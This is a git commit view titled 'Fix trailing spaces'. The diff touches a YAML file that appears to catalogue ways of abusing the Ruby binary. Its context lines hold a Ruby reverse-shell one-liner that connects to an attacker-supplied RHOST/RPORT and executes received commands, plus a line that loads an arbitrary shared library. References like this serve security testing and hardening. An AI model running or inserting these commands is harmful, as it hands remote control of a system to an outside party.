Fix trailing spaces
This commit is contained in:
@@ -17,4 +17,4 @@ functions:
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
load-library:
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
---
|
||||
---
|
||||
|
||||
Reference in New Issue
Block a user